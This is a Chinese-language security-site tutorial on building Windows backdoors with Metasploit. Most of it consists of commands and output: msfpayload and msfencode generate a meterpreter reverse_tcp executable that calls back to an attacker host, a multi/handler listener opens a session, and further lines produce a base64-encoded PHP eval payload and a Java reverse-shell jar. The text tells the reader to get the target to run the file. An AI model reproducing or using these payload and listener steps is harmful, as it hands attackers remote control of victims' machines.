热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

Metasploit BackDoor For Windows

发布时间:2012-04-09 09:30文章来源:Dis9 Team文章作者:秩名 点击次数:
摘要:Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试,shellcode 编写和漏洞研究提供了一个可靠平台。...

前言

Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试,shellcode 编写和漏洞研究提供了一个可靠平台。
这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。最新版本的 MSF 包含了750多种流行的操作系统及应用软件的漏洞,以及N个 shellcode 。作为安全工具,它在安全检测中用着不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供了有力保障。
同时他也提供了多种后门的方式,现在我们简单的了解他
msfpayload as shellcode

root@Dis9Team:/home/brk# msfpayload -l

msf backdoor for windows

他能生成多种多样的
简单的来说一个
正常的Windows后门

:用的是:windows/meterpreter/reverse_tcp

msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
msfencode -b '' -t exe -o /var/www/meterpreter.exe

msf backdoor for windows

生成以后让目标运行 我们需要进行监听,或者SHELL

  1. msf > use exploit/multi/handler 
  2. msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
  3. PAYLOAD => windows/meterpreter/reverse_tcp 
  4. msf  exploit(handler) > set LHOST 5.5.5.1 
  5. LHOST => 5.5.5.1 
  6. msf  exploit(handler) > set LPORT 8080 
  7. LPORT => 8080 
  8. msf  exploit(handler) > exploit  
  9.   
  10. [*] Started reverse handler on 5.5.5.1:8080 
  11. [*] Starting the payload handler... 
  12. [*] Sending stage (752128 bytes) to 5.5.5.3 
  13. [*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2012-03-21 23:26:58 +0800 
  14.   
  15. meterpreter > 

其他(php asp jsp dll)

选中你的msfpayload名字,生成,你动的 例如:
Dll:

msf backdoor for windows

参考: The DLL Hijacking Tutorial
php:

 msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->

 

JAVA:

 ./msfpayload java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 W > /tmp/job.jar

 

标签分类: Metasploit.B

上一篇:Metasploit Bypass windows 7 UAC
下一篇:通过黄页模块XSS漏洞拿PHPCMS V9后台管理权限